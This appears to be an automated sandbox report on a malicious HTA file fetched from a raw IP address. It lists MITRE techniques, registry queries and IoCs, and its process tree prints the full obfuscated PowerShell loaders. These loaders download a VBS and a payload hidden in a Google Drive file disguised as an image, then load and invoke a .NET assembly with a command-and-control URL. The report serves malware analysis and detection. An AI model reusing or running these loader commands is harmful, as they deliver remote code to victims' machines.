hxxp://192[.]3[.]176[.]141/42/ug/seethebestthingsevermeetwithgreatthingstobegood[.]hta

Analysis

max time kernel
25s
max time network
49s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-10-2024 11:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.hta

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
41	2208	PoweRShELl.EXe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5876	powershell.exe
5956	powershell.exe
6700	powershell.exe
6908	powershell.exe
6084	powershell.exe
5496	powershell.exe
5976	powershell.exe
3760	powershell.exe

Evasion via Device Credential Deployment 8 IoCs

defense_evasion execution

pid	Process
5148	PoweRShELl.EXe
5308	powershell.exe
2208	PoweRShELl.EXe
5212	powershell.exe
5388	PoweRShELl.EXe
5604	powershell.exe
5868	PoweRShELl.EXe
5156	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	mshta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
42	drive.google.com
43	drive.google.com
48	drive.google.com
50	drive.google.com
65	drive.google.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoweRShELl.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoweRShELl.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoweRShELl.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoweRShELl.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 111573.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
4980	msedge.exe
4980	msedge.exe
3976	msedge.exe
3976	msedge.exe
536	identity_helper.exe
536	identity_helper.exe
3588	msedge.exe
3588	msedge.exe
2208	PoweRShELl.EXe
2208	PoweRShELl.EXe
2208	PoweRShELl.EXe
5212	powershell.exe
5212	powershell.exe
5212	powershell.exe
5388	PoweRShELl.EXe
5388	PoweRShELl.EXe
5388	PoweRShELl.EXe
5604	powershell.exe
5604	powershell.exe
5604	powershell.exe
5868	PoweRShELl.EXe
5868	PoweRShELl.EXe
5868	PoweRShELl.EXe
5156	powershell.exe
5156	powershell.exe
5156	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2208	PoweRShELl.EXe
Token: SeDebugPrivilege	5212	powershell.exe
Token: SeDebugPrivilege	5388	PoweRShELl.EXe
Token: SeDebugPrivilege	5604	powershell.exe
Token: SeDebugPrivilege	5868	PoweRShELl.EXe
Token: SeDebugPrivilege	5156	powershell.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3976 wrote to memory of 1496	3976	msedge.exe	85
PID 3976 wrote to memory of 1496	3976	msedge.exe	85
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 324	3976	msedge.exe	86
PID 3976 wrote to memory of 4980	3976	msedge.exe	87
PID 3976 wrote to memory of 4980	3976	msedge.exe	87
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88
PID 3976 wrote to memory of 3012	3976	msedge.exe	88

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.hta
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8885846f8,0x7ff888584708,0x7ff888584718
  2⤵
  PID:1496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
  2⤵
  PID:324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
  2⤵
  PID:3012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
  2⤵
  PID:796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:3612
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4724 /prefetch:8
  2⤵
  PID:1712
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4724 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5156 /prefetch:8
  2⤵
  PID:1956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
  2⤵
  PID:1108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,580122768403386440,1484838940985938343,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3588
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\seethebestthingsevermeetwithgreatthingstobegood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  PID:1948
- - C:\Windows\SysWOW64\winDowspOWErShell\v1.0\PoweRShELl.EXe
    "C:\Windows\SySTeM32\winDowspOWErShell\v1.0\PoweRShELl.EXe" "powErshell -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt ; IeX($(iex('[SystEM.TExt.EncoDING]'+[ChAr]0x3A+[char]58+'UTf8.gETSTrIng([SystEm.cOnVeRT]'+[CHar]0x3A+[ChaR]58+'FROMBasE64STRIng('+[cHar]0X22+'JFpibFZsdVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFckRlRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExIayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2FseXlhR21BWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpUkpqdVRGeUZsTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhZIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFPaGJRUSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRaYmxWbHVSdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xNDEvNDIvbG9naXN0aWN0aGluZ3N3aXRoZ29vZHRoaW5nc2dpdmVuYmVzdC50SUYiLCIkRU5WOkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIiwwLDApO3N0QVJ0LXNsZWVwKDMpO3N0QVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIg=='+[Char]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2208
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt
      4⤵
      Evasion via Device Credential Deployment
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5212
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2qsaqg0p\2qsaqg0p.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6000
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF00D.tmp" "c:\Users\Admin\AppData\Local\Temp\2qsaqg0p\CSC55BA3E6A16A94C5686998E6FC043B83.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6128
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS"
      4⤵
      PID:6008
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdXaDdpbWFnZVVybCA9IHJmSWh0dHBzOi8vZHJpdmUuZ28nKydvZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHJmSTtXaDd3ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1doN2ltYScrJ2dlQnl0ZXMgPSBXaCcrJzcnKyd3ZWJDbGllbnQuRG93bmxvYWREYXRhKFdoN2ltYWdlVXJsKTtXaDdpbScrJ2FnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW4nKydjb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhXaCcrJzdpbWFnZUJ5dGVzKTtXaDdzdGFyJysndEZsYWcgPSByZkk8PEJBU0U2NF9TVEFSVD4+cmZJO1doN2VuZEZsYWcgPSByZkk8PEJBU0U2NCcrJ19FTkQ+PnJmSTtXaDdzdGFydEluZGV4ID0gV2g3aW1hZ2VUZXh0LkluZGV4T2YoV2g3c3RhcnRGbGFnKTtXaDdlbmRJbicrJ2RleCA9IFdoN2ltYScrJ2dlVGV4dC5JbmRleE9mKFdoN2VuZEZsYScrJ2cpO1doN3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXaDdlbmRJbmRleCAtZ3QgV2g3c3RhcnRJbmQnKydleDtXJysnaDdzdGFydEluZGV4ICs9IFdoN3N0YXJ0RmxhZy5MZW5ndGg7V2g3YmFzZTY0TGVuZ3RoID0gV2g3ZW5kSW5kZXggLSBXaDdzdGFydEluZGV4O1doN2Jhc2U2NENvbW1hbmQgPSBXaDdpbWFnZVRleHQuU3Vic3RyaW5nKFdoN3N0YXJ0SW5kZXgsIFdoN2Jhc2U2NExlbmd0aCknKyc7V2g3YmEnKydzZTY0UicrJ2V2ZXJzZWQgPSAtam9pbiAoV2g3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJZOSBGb3JFYWNoLU9iamVjdCB7IFdoNycrJ18gfSlbLTEuLi0oV2g3YmFzZTY0Q29tbWFuZC5MZW5ndGgnKycpXTtXaDdjJysnb21tYW5kQnl0ZXMgPSBbU3lzdCcrJ2VtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFdoN2JhJysnc2U2NFJldmVyc2VkKTtXaDdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoV2g3Y29tbWFuJysnZEJ5dGVzJysnKTtXaDd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHJmSVZBSXJmSSk7JysnV2g3dmFpTWV0aG9kLkludm9rZShXaDdudWwnKydsLCBAKHJmSXR4dC5JS0xHT0wvMjQvMTQxLjY3MS4zLicrJzI5MS8vOnB0dGhyZkknKycsIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWFzcG5ldF9yZWdicm93c2Vyc3JmSSwgcmZJZGVzYXRpdmFkb3JmSSwgcmZJZGVzYXRpdmFkb3JmSSxyZklkJysnZXNhdGl2YWRvJysncmZJLHJmJysnSWRlc2F0aXZhJysnZG9yZkkscmZJZGVzYXRpdmFkb3JmSSxyZklkZXNhdGl2YWQnKydvcmZJLHJmSWRlc2F0aXZhZCcrJ29yZkkscmZJMXJmSSxyZklkZXNhdGl2YWRvcmZJKSk7JykuUkVQTEFjRSgoW0NIYXJdODcrW0NIYXJdMTA0K1tDSGFyXTU1KSwnJCcpLlJFUExBY0UoJ3JmSScsW3N0cmluR11bQ0hhcl0zOSkuUkVQTEFjRSgoW0NIYXJdODIrW0NIYXJdODkrW0NIYXJdNTcpLFtzdHJpbkddW0NIYXJdMTI0KSB8LiAoICRWRXJCb1NFUHJlZkVyZU5DZS5Ub3NUUmluZygpWzEsM10rJ1gnLWpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6084
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Wh7imageUrl = rfIhttps://drive.go'+'ogle.com/uc?export=download&id='+'1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur rfI;Wh7webCli'+'ent = New-Object System.Net.WebClient;Wh7ima'+'geBytes = Wh'+'7'+'webClient.DownloadData(Wh7imageUrl);Wh7im'+'ageText = [System.Tex'+'t.En'+'coding]::UTF8.GetSt'+'ring(Wh'+'7imageBytes);Wh7star'+'tFlag = rfI<<BASE64_START>>rfI;Wh7endFlag = rfI<<BASE64'+'_END>>rfI;Wh7startIndex = Wh7imageText.IndexOf(Wh7startFlag);Wh7endIn'+'dex = Wh7ima'+'geText.IndexOf(Wh7endFla'+'g);Wh7startIndex -ge 0 -and Wh7endIndex -gt Wh7startInd'+'ex;W'+'h7startIndex += Wh7startFlag.Length;Wh7base64Length = Wh7endIndex - Wh7startIndex;Wh7base64Command = Wh7imageText.Substring(Wh7startIndex, Wh7base64Length)'+';Wh7ba'+'se64R'+'eversed = -join (Wh7base64Command.ToCharArray() RY9 ForEach-Object { Wh7'+'_ })[-1..-(Wh7base64Command.Length'+')];Wh7c'+'ommandBytes = [Syst'+'em.Convert]::FromBase64String(Wh7ba'+'se64Reversed);Wh7loadedAssembly = [System.Reflection.Assembly]::Load(Wh7comman'+'dBytes'+');Wh7vaiMethod = [dnlib.IO.Home].GetMethod(rfIVAIrfI);'+'Wh7vaiMethod.Invoke(Wh7nul'+'l, @(rfItxt.IKLGOL/24/141.671.3.'+'291//:ptthrfI'+', rfIdesativadorfI, rfIdesativadorfI, rfIdesativadorfI, rfIaspnet_regbrowsersrfI, rfIdesativadorfI, rfIdesativadorfI,rfId'+'esativado'+'rfI,rf'+'Idesativa'+'dorfI,rfIdesativadorfI,rfIdesativad'+'orfI,rfIdesativad'+'orfI,rfI1rfI,rfIdesativadorfI));').REPLAcE(([CHar]87+[CHar]104+[CHar]55),'$').REPLAcE('rfI',[strinG][CHar]39).REPLAcE(([CHar]82+[CHar]89+[CHar]57),[strinG][CHar]124) |. ( $VErBoSEPrefEreNCe.TosTRing()[1,3]+'X'-joIn'')"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3760
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\seethebestthingsevermeetwithgreatthingstobegood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  PID:5324
- - C:\Windows\SysWOW64\winDowspOWErShell\v1.0\PoweRShELl.EXe
